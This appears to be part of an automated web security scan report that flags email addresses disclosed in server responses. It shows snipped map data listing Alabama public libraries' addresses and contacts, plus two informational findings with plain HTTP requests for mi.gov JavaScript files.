256",dscr:"\x3cb\x3eAttalla-Etowah Co. Public Library\x3c/b\x3e\x3cbr\x3e604 North 4th Street \x3cbr\x3eAttalla, AL 35954-9266\x3cbr\x3e256-538-9266\x3cbr\x3e256-538-9223\x3cbr\x3e\x3ca href=\"mailto:lspears@microxl.com\" target=\"_blank\"\x3elspears@microxl.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.023859,-86.088069\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
,description:"\x3cb\x3eGadsden-Etowah Co. Public Library\x3c/b\x3e\x3cbr\x3e254 College Street\x3cbr\x3eGadsden, AL 35901-4135\x3cbr\x3e256-549-4699\x3cbr\x3e256-549-4770\x3cbr\x3e\x3ca href=\"mailto:gpl@gadsden.com\" target=\"_blank\"\x3egpl@gadsden.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.library.gadsden.com\" target=\"_blank\"\x3ehttp://www.library.gadsden.com\x3c/a\x3e",infoWindow:{title:"Gadsden-Etowah Co. Public Library",basics:"\x3cdiv tr
...[SNIP]...
256-54",dscr:"\x3cb\x3eGadsden-Etowah Co. Public Library\x3c/b\x3e\x3cbr\x3e254 College Street\x3cbr\x3eGadsden, AL 35901-4135\x3cbr\x3e256-549-4699\x3cbr\x3e256-549-4770\x3cbr\x3e\x3ca href=\"mailto:gpl@gadsden.com\" target=\"_blank\"\x3egpl@gadsden.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.library.gadsden.com\" target=\"_blank\"\x3ehttp://www.library.gadsden.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26
...[SNIP]...
",description:"\x3cb\x3eRainbow City Public Library\x3c/b\x3e\x3cbr\x3e3702 Rainbow Drive\x3cbr\x3eRainbow City, AL 35906-6324\x3cbr\x3e256-442-8477\x3cbr\x3e256-442-4128\x3cbr\x3e\x3ca href=\"mailto:rbclibrary@bellsouth.net\" target=\"_blank\"\x3erbclibrary@bellsouth.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.rbclibrary.org\" target=\"_blank\"\x3ewww.rbclibrary.org\x3c/a\x3e",infoWindow:{title:"Rainbow City Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3
...[SNIP]...
256-442",dscr:"\x3cb\x3eRainbow City Public Library\x3c/b\x3e\x3cbr\x3e3702 Rainbow Drive\x3cbr\x3eRainbow City, AL 35906-6324\x3cbr\x3e256-442-8477\x3cbr\x3e256-442-4128\x3cbr\x3e\x3ca href=\"mailto:rbclibrary@bellsouth.net\" target=\"_blank\"\x3erbclibrary@bellsouth.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.rbclibrary.org\" target=\"_blank\"\x3ewww.rbclibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.95
...[SNIP]...
Floyd Public Library",description:"\x3cb\x3eRufus Floyd Public Library\x3c/b\x3e\x3cbr\x3e3310 Alfords Bend Road\x3cbr\x3eHokes Bluff, AL 35903-9804\x3cbr\x3e256-492-9846\x3cbr\x3e\x3ca href=\"mailto:hbcpl@cybrtyme.com\" target=\"_blank\"\x3ehbcpl@cybrtyme.com\x3c/a\x3e",infoWindow:{title:"Rufus Floyd Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Rufus Floyd Public Library3310 Alfords Bend RoadHokes Bluff, AL 35903-9804256-4",dscr:"\x3cb\x3eRufus Floyd Public Library\x3c/b\x3e\x3cbr\x3e3310 Alfords Bend Road\x3cbr\x3eHokes Bluff, AL 35903-9804\x3cbr\x3e256-492-9846\x3cbr\x3e\x3ca href=\"mailto:hbcpl@cybrtyme.com\" target=\"_blank\"\x3ehbcpl@cybrtyme.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.993812,-85.866119\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
brary",description:"\x3cb\x3eCarbon Hill City Library\x3c/b\x3e\x3cbr\x3e414 NW 5th Avenue\x3cbr\x3eCarbon Hill, AL 35549-0116\x3cbr\x3e205-924-4254\x3cbr\x3e205-924-4254\x3cbr\x3e\x3ca href=\"mailto:cerls@ala.nu\" target=\"_blank\"\x3ecerls@ala.nu\x3c/a\x3e",infoWindow:{title:"Carbon Hill City Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Carbon Hill City Library414 NW 5th AvenueCarbon Hill, AL 35549-0116205-924-4254",dscr:"\x3cb\x3eCarbon Hill City Library\x3c/b\x3e\x3cbr\x3e414 NW 5th Avenue\x3cbr\x3eCarbon Hill, AL 35549-0116\x3cbr\x3e205-924-4254\x3cbr\x3e205-924-4254\x3cbr\x3e\x3ca href=\"mailto:cerls@ala.nu\" target=\"_blank\"\x3ecerls@ala.nu\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.893810,-87.530568\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ry",description:"\x3cb\x3eCarl Elliott Regional Library\x3c/b\x3e\x3cbr\x3e98 East 18th Street \x3cbr\x3eJasper, AL 35501-5491\x3cbr\x3e205-221-2568\x3cbr\x3e205-221-2584\x3cbr\x3e\x3ca href=\"mailto:ill_cerls@hotmail.com\" target=\"_blank\"\x3eill_cerls@hotmail.com\x3c/a\x3e",infoWindow:{title:"Carl Elliott Regional Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Carl Elliott Regional Library98 East 18th Street Jasper, AL 35501-5491205-221-2",dscr:"\x3cb\x3eCarl Elliott Regional Library\x3c/b\x3e\x3cbr\x3e98 East 18th Street \x3cbr\x3eJasper, AL 35501-5491\x3cbr\x3e205-221-2568\x3cbr\x3e205-221-2584\x3cbr\x3e\x3ca href=\"mailto:ill_cerls@hotmail.com\" target=\"_blank\"\x3eill_cerls@hotmail.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.833491,-87.274530\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
blic Library",description:"\x3cb\x3eCordova Public Library\x3c/b\x3e\x3cbr\x3e130 Main Street\x3cbr\x3eCordova , AL 35550-1414\x3cbr\x3e205-483-9578\x3cbr\x3e205-483-9578\x3cbr\x3e\x3ca href=\"mailto:cerls@sonet.net\" target=\"_blank\"\x3ecerls@sonet.net\x3c/a\x3e",infoWindow:{title:"Cordova Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Cordova Public Library130 Main StreetCordova , AL 35550-1414205-483-9578205-483",dscr:"\x3cb\x3eCordova Public Library\x3c/b\x3e\x3cbr\x3e130 Main Street\x3cbr\x3eCordova , AL 35550-1414\x3cbr\x3e205-483-9578\x3cbr\x3e205-483-9578\x3cbr\x3e\x3ca href=\"mailto:cerls@sonet.net\" target=\"_blank\"\x3ecerls@sonet.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.759458,-87.183159\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ora Public Library",description:"\x3cb\x3eDora Public Library\x3c/b\x3e\x3cbr\x3e1485 Sharon Blvd\x3cbr\x3eDora, AL 35062-3211\x3cbr\x3e205-648-3211\x3cbr\x3e205-648-3399\x3cbr\x3e\x3ca href=\"mailto:cerls@sonet.net\" target=\"_blank\"\x3ecerls@sonet.net\x3c/a\x3e",infoWindow:{title:"Dora Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Dora Public Library1485 Sharon BlvdDora, AL 35062-3211205-648-3211205-648-3399c",dscr:"\x3cb\x3eDora Public Library\x3c/b\x3e\x3cbr\x3e1485 Sharon Blvd\x3cbr\x3eDora, AL 35062-3211\x3cbr\x3e205-648-3211\x3cbr\x3e205-648-3399\x3cbr\x3e\x3ca href=\"mailto:cerls@sonet.net\" target=\"_blank\"\x3ecerls@sonet.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.738975,-87.079634\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ic Library",description:"\x3cb\x3eJasper Public Library\x3c/b\x3e\x3cbr\x3e98 East 18th Street \x3cbr\x3eJasper, AL 35501-5491\x3cbr\x3e205-221-8512\x3cbr\x3e205-221-2584\x3cbr\x3e\x3ca href=\"mailto:cerls@sonet.net\" target=\"_blank\"\x3ecerls@sonet.net\x3c/a\x3e",infoWindow:{title:"Jasper Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Jasper Public Library98 East 18th Street Jasper, AL 35501-5491205-221-8512205-2",dscr:"\x3cb\x3eJasper Public Library\x3c/b\x3e\x3cbr\x3e98 East 18th Street \x3cbr\x3eJasper, AL 35501-5491\x3cbr\x3e205-221-8512\x3cbr\x3e205-221-2584\x3cbr\x3e\x3ca href=\"mailto:cerls@sonet.net\" target=\"_blank\"\x3ecerls@sonet.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.833491,-87.274530\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
n Public Library",description:"\x3cb\x3eSumiton Public Library\x3c/b\x3e\x3cbr\x3eState Street\x3cbr\x3eSumiton, AL 35148-0010\x3cbr\x3e205-648-7451\x3cbr\x3e205-648-7451\x3cbr\x3e\x3ca href=\"mailto:cerls@sonet.net\" target=\"_blank\"\x3ecerls@sonet.net\x3c/a\x3e",infoWindow:{title:"Sumiton Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Sumiton Public LibraryState StreetSumiton, AL 35148-0010205-648-7451205-648-745",dscr:"\x3cb\x3eSumiton Public Library\x3c/b\x3e\x3cbr\x3eState Street\x3cbr\x3eSumiton, AL 35148-0010\x3cbr\x3e205-648-7451\x3cbr\x3e205-648-7451\x3cbr\x3e\x3ca href=\"mailto:cerls@sonet.net\" target=\"_blank\"\x3ecerls@sonet.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.753497,-87.044913\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
County Library",description:"\x3cb\x3eWilcox County Library\x3c/b\x3e\x3cbr\x3e100 Broad Street\x3cbr\x3eCamden, AL 36726-1702\x3cbr\x3e334-682-4355\x3cbr\x3e334-682-5437\x3cbr\x3e\x3ca href=\"mailto:wilcoxlibrary@frontiernet.net\" target=\"_blank\"\x3ewilcoxlibrary@frontiernet.net\x3c/a\x3e",infoWindow:{title:"Wilcox County Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Wilcox County Library100 Broad StreetCamden, AL 36726-1702334-682-4355334-682-5",dscr:"\x3cb\x3eWilcox County Library\x3c/b\x3e\x3cbr\x3e100 Broad Street\x3cbr\x3eCamden, AL 36726-1702\x3cbr\x3e334-682-4355\x3cbr\x3e334-682-5437\x3cbr\x3e\x3ca href=\"mailto:wilcoxlibrary@frontiernet.net\" target=\"_blank\"\x3ewilcoxlibrary@frontiernet.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.990963,-87.289184\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
:"Arley Public Library",description:"\x3cb\x3eArley Public Library\x3c/b\x3e\x3cbr\x3eTown Hall \x3cbr\x3eArley, AL 35541-0146\x3cbr\x3e205-387-0129\x3cbr\x3e205-387-0129\x3cbr\x3e\x3ca href=\"mailto:cerls@ala.nu\" target=\"_blank\"\x3ecerls@ala.nu\x3c/a\x3e",infoWindow:{title:"Arley Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Arley Public LibraryTown Hall Arley, AL 35541-0146205-387-0129205-387-0129cerls",dscr:"\x3cb\x3eArley Public Library\x3c/b\x3e\x3cbr\x3eTown Hall \x3cbr\x3eArley, AL 35541-0146\x3cbr\x3e205-387-0129\x3cbr\x3e205-387-0129\x3cbr\x3e\x3ca href=\"mailto:cerls@ala.nu\" target=\"_blank\"\x3ecerls@ala.nu\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.076103,-87.181027\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ary",description:"\x3cb\x3eDouble Springs Public Library\x3c/b\x3e\x3cbr\x3eBlake Drive\x3cbr\x3eDouble Springs, AL 35553-0555\x3cbr\x3e205-489-2412\x3cbr\x3e205-489-2412\x3cbr\x3e\x3ca href=\"mailto:cerls@sonet.net\" target=\"_blank\"\x3ecerls@sonet.net\x3c/a\x3e",infoWindow:{title:"Double Springs Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Double Springs Public LibraryBlake DriveDouble Springs, AL 35553-0555205-489-24",dscr:"\x3cb\x3eDouble Springs Public Library\x3c/b\x3e\x3cbr\x3eBlake Drive\x3cbr\x3eDouble Springs, AL 35553-0555\x3cbr\x3e205-489-2412\x3cbr\x3e205-489-2412\x3cbr\x3e\x3ca href=\"mailto:cerls@sonet.net\" target=\"_blank\"\x3ecerls@sonet.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.153510,-87.403744\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ibrary",description:"\x3cb\x3eHaleyville Public Library\x3c/b\x3e\x3cbr\x3e913 20th Street \x3cbr\x3eHaleyville, AL 35565-1323\x3cbr\x3e205-486-7450\x3cbr\x3e205-486-7450\x3cbr\x3e\x3ca href=\"mailto:haleyville000@centurytel.net\" target=\"_blank\"\x3ehaleyville000@centurytel.net\x3c/a\x3e",infoWindow:{title:"Haleyville Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Haleyville Public Library913 20th Street Haleyville, AL 35565-1323205-486-74502",dscr:"\x3cb\x3eHaleyville Public Library\x3c/b\x3e\x3cbr\x3e913 20th Street \x3cbr\x3eHaleyville, AL 35565-1323\x3cbr\x3e205-486-7450\x3cbr\x3e205-486-7450\x3cbr\x3e\x3ca href=\"mailto:haleyville000@centurytel.net\" target=\"_blank\"\x3ehaleyville000@centurytel.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.226193,-87.624943\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ion:"\x3cb\x3eAnniston-Calhoun County Public Library\x3c/b\x3e\x3cbr\x3e108 East 10th Street \x3cbr\x3eAnniston, AL 36202-0308\x3cbr\x3e256-237-8503\x3cbr\x3e256-237-8503\x3cbr\x3e\x3ca href=\"mailto:bseymour@anniston.lib.al.us\" target=\"_blank\"\x3ebseymour@anniston.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.anniston.lib.al.us\" target=\"_blank\"\x3ehttp://www.anniston.lib.al.us\x3c/a\x3e",infoWindow:{title:"Anniston-Calhoun County Public Library",basics:"\x3cdiv
...[SNIP]...
scr:"\x3cb\x3eAnniston-Calhoun County Public Library\x3c/b\x3e\x3cbr\x3e108 East 10th Street \x3cbr\x3eAnniston, AL 36202-0308\x3cbr\x3e256-237-8503\x3cbr\x3e256-237-8503\x3cbr\x3e\x3ca href=\"mailto:bseymour@anniston.lib.al.us\" target=\"_blank\"\x3ebseymour@anniston.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.anniston.lib.al.us\" target=\"_blank\"\x3ehttp://www.anniston.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=
...[SNIP]...
y",description:"\x3cb\x3eJacksonville Public Library\x3c/b\x3e\x3cbr\x3e200 Pelham Road S\x3cbr\x3eJacksonville, AL 36265-2153\x3cbr\x3e256-435-6332\x3cbr\x3e256-435-4459\x3cbr\x3e\x3ca href=\"mailto:jplkids@hotmail.com\" target=\"_blank\"\x3ejplkids@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.jacksonvillepubliclibrary.org\" target=\"_blank\"\x3ehttp://www.jacksonvillepubliclibrary.org\x3c/a\x3e",infoWindow:{title:"Jacksonville Public Library",basi
...[SNIP]...
256-435-",dscr:"\x3cb\x3eJacksonville Public Library\x3c/b\x3e\x3cbr\x3e200 Pelham Road S\x3cbr\x3eJacksonville, AL 36265-2153\x3cbr\x3e256-435-6332\x3cbr\x3e256-435-4459\x3cbr\x3e\x3ca href=\"mailto:jplkids@hotmail.com\" target=\"_blank\"\x3ejplkids@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.jacksonvillepubliclibrary.org\" target=\"_blank\"\x3ehttp://www.jacksonvillepubliclibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?
...[SNIP]...
,name:"Ohatchee Public Library",description:"\x3cb\x3eOhatchee Public Library\x3c/b\x3e\x3cbr\x3e7805 Alabama Highway 77\x3cbr\x3eOhatchee, AL 36271\x3cbr\x3e256-892-3233\x3cbr\x3e\x3ca href=\"mailto:asmith@townofohatchee.com\" target=\"_blank\"\x3easmith@townofohatchee.com\x3c/a\x3e",infoWindow:{title:"Ohatchee Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Ohatchee Public Library7805 Alabama Highway 77Ohatchee, AL 36271256-892-3233asm",dscr:"\x3cb\x3eOhatchee Public Library\x3c/b\x3e\x3cbr\x3e7805 Alabama Highway 77\x3cbr\x3eOhatchee, AL 36271\x3cbr\x3e256-892-3233\x3cbr\x3e\x3ca href=\"mailto:asmith@townofohatchee.com\" target=\"_blank\"\x3easmith@townofohatchee.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.778808,-86.012919\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
Library",description:"\x3cb\x3eOxford Public Library\x3c/b\x3e\x3cbr\x3e213 Choccolocco Street\x3cbr\x3eOxford, AL 36203-1617\x3cbr\x3e256-831-1750\x3cbr\x3e256-835-6107\x3cbr\x3e\x3ca href=\"mailto:opl@nti.net\" target=\"_blank\"\x3eopl@nti.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",infoWindow:{title:"Oxford Public Library",basics:"\x3cdiv tr
...[SNIP]...
256-831-1750256",dscr:"\x3cb\x3eOxford Public Library\x3c/b\x3e\x3cbr\x3e213 Choccolocco Street\x3cbr\x3eOxford, AL 36203-1617\x3cbr\x3e256-831-1750\x3cbr\x3e256-835-6107\x3cbr\x3e\x3ca href=\"mailto:opl@nti.net\" target=\"_blank\"\x3eopl@nti.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=t
...[SNIP]...
iption:"\x3cb\x3eH. Grady Bradshaw-Chambers County Library\x3c/b\x3e\x3cbr\x3e3419 20th Avenue \x3cbr\x3eValley, AL 36854-3299\x3cbr\x3e334-768-2161\x3cbr\x3e334-768-7272\x3cbr\x3e\x3ca href=\"mailto:chamberscountylibrary@yahoo.com\" target=\"_blank\"\x3echamberscountylibrary@yahoo.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.chamberscountylibrary.org\" target=\"_blank\"\x3ehttp://www.chamberscountylibrary.org\x3c/a\x3e",infoWindow:{title:"H. Grady Bradshaw-Chambers County Library
...[SNIP]...
",dscr:"\x3cb\x3eH. Grady Bradshaw-Chambers County Library\x3c/b\x3e\x3cbr\x3e3419 20th Avenue \x3cbr\x3eValley, AL 36854-3299\x3cbr\x3e334-768-2161\x3cbr\x3e334-768-7272\x3cbr\x3e\x3ca href=\"mailto:chamberscountylibrary@yahoo.com\" target=\"_blank\"\x3echamberscountylibrary@yahoo.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.chamberscountylibrary.org\" target=\"_blank\"\x3ehttp://www.chamberscountylibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=t
...[SNIP]...
ibrary",description:"\x3cb\x3eCherokee County Public Library\x3c/b\x3e\x3cbr\x3e310 Main Street\x3cbr\x3eCentre, AL 35960-2026\x3cbr\x3e256-927-5838\x3cbr\x3e256-927-2800\x3cbr\x3e\x3ca href=\"mailto:cpi@peop.tdsnet.com\" target=\"_blank\"\x3ecpi@peop.tdsnet.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",infoWindow:{title:"Cherokee County Public Library",basics:"\
...[SNIP]...
256-927-58382",dscr:"\x3cb\x3eCherokee County Public Library\x3c/b\x3e\x3cbr\x3e310 Main Street\x3cbr\x3eCentre, AL 35960-2026\x3cbr\x3e256-927-5838\x3cbr\x3e256-927-2800\x3cbr\x3e\x3ca href=\"mailto:cpi@peop.tdsnet.com\" target=\"_blank\"\x3ecpi@peop.tdsnet.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=t
...[SNIP]...
rary",description:"\x3cb\x3eChilton-Clanton Public Library\x3c/b\x3e\x3cbr\x3e100 First Avenue\x3cbr\x3eClanton, AL 35045-3499\x3cbr\x3e205-755-1768\x3cbr\x3e205-755-1374\x3cbr\x3e\x3ca href=\"mailto:ccpljo@bellsouth.net\" target=\"_blank\"\x3eccpljo@bellsouth.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.ccpl.lib.al.us\" target=\"_blank\"\x3ehttp://www.ccpl.lib.al.us\x3c/a\x3e",infoWindow:{title:"Chilton-Clanton Public Library",basics:"\x3cdiv transclude=\"iw
...[SNIP]...
205-755-176",dscr:"\x3cb\x3eChilton-Clanton Public Library\x3c/b\x3e\x3cbr\x3e100 First Avenue\x3cbr\x3eClanton, AL 35045-3499\x3cbr\x3e205-755-1768\x3cbr\x3e205-755-1374\x3cbr\x3e\x3ca href=\"mailto:ccpljo@bellsouth.net\" target=\"_blank\"\x3eccpljo@bellsouth.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.ccpl.lib.al.us\" target=\"_blank\"\x3ehttp://www.ccpl.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=
...[SNIP]...
description:"\x3cb\x3eChoctaw County Public Library\x3c/b\x3e\x3cbr\x3e124 North Academy Avenue\x3cbr\x3eButler, AL 36904-2206\x3cbr\x3e205-459-2542\x3cbr\x3e205-459-4122\x3cbr\x3e\x3ca href=\"mailto:ccpl1@hotmail.com\" target=\"_blank\"\x3eccpl1@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.pinebelt.net/\" target=\"_blank\"\x3ehttp://www.pinebelt.net/\"ccpl\x3c/a\x3e",infoWindow:{title:"Choctaw County Public Library",basics:"\x3cdiv transclude=\
...[SNIP]...
205-4",dscr:"\x3cb\x3eChoctaw County Public Library\x3c/b\x3e\x3cbr\x3e124 North Academy Avenue\x3cbr\x3eButler, AL 36904-2206\x3cbr\x3e205-459-2542\x3cbr\x3e205-459-4122\x3cbr\x3e\x3ca href=\"mailto:ccpl1@hotmail.com\" target=\"_blank\"\x3eccpl1@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.pinebelt.net/\" target=\"_blank\"\x3ehttp://www.pinebelt.net/\"ccpl\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x
...[SNIP]...
brary",description:"\x3cb\x3eGrove Hill Public Library\x3c/b\x3e\x3cbr\x3e108 DuBose Avenue\x3cbr\x3eGrove Hill, AL 36451-9502\x3cbr\x3e251-275-8157\x3cbr\x3e334-275-8157\x3cbr\x3e\x3ca href=\"mailto:betsywest43@yahoo.com\" target=\"_blank\"\x3ebetsywest43@yahoo.com\x3c/a\x3e",infoWindow:{title:"Grove Hill Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Grove Hill Public Library108 DuBose AvenueGrove Hill, AL 36451-9502251-275-8157",dscr:"\x3cb\x3eGrove Hill Public Library\x3c/b\x3e\x3cbr\x3e108 DuBose Avenue\x3cbr\x3eGrove Hill, AL 36451-9502\x3cbr\x3e251-275-8157\x3cbr\x3e334-275-8157\x3cbr\x3e\x3ca href=\"mailto:betsywest43@yahoo.com\" target=\"_blank\"\x3ebetsywest43@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.705333,-87.775554\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ibrary",description:"\x3cb\x3eThomasville Public Library\x3c/b\x3e\x3cbr\x3e1401 Moseley Drive\x3cbr\x3eThomasville , AL 36784\x3cbr\x3e334-636-5343\x3cbr\x3e334-275-5343\x3cbr\x3e\x3ca href=\"mailto:kerry_81@hotmail.com\" target=\"_blank\"\x3ekerry_81@hotmail.com\x3c/a\x3e",infoWindow:{title:"Thomasville Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Thomasville Public Library1401 Moseley DriveThomasville , AL 36784334-636-53433",dscr:"\x3cb\x3eThomasville Public Library\x3c/b\x3e\x3cbr\x3e1401 Moseley Drive\x3cbr\x3eThomasville , AL 36784\x3cbr\x3e334-636-5343\x3cbr\x3e334-275-5343\x3cbr\x3e\x3ca href=\"mailto:kerry_81@hotmail.com\" target=\"_blank\"\x3ekerry_81@hotmail.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=31.932415,-87.737448\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...

22.72. http://mi.gov/js/jquery.cross-slide.min.0.6.2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mi.gov
Path:   /js/jquery.cross-slide.min.0.6.2.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.cross-slide.min.0.6.2.js HTTP/1.1
Host: mi.gov
Proxy-Connection: keep-alive
Referer: http://mi.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:26:38 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 14 Apr 2011 15:36:23 GMT
ETag: "157b4-1a7c-b004cbc0"
Accept-Ranges: bytes
Content-Length: 6780
Cache-Control: public, max-age=86400
Content-Type: application/x-javascript

/*
* CrossSlide jQuery plugin v0.6.2
*
* Copyright 2007-2010 by Tobia Conforto <tobia.conforto@gmail.com>
*
* This program is free software; you can redistribute it and/or modify it
* under the
...[SNIP]...

22.73. http://mi.gov/js/jquery.cross-slide.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mi.gov
Path:   /js/jquery.cross-slide.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.cross-slide.min.js HTTP/1.1
Host: mi.gov
Proxy-Connection: keep-alive
Referer: http://mi.gov/som/0,1607,7-192-29939---,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:27:31 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 12 Apr 2011 20:31:34 GMT
ETag: "1573a-17fc-93fe7580"
Accept-Ranges: bytes
Content-Length: 6140
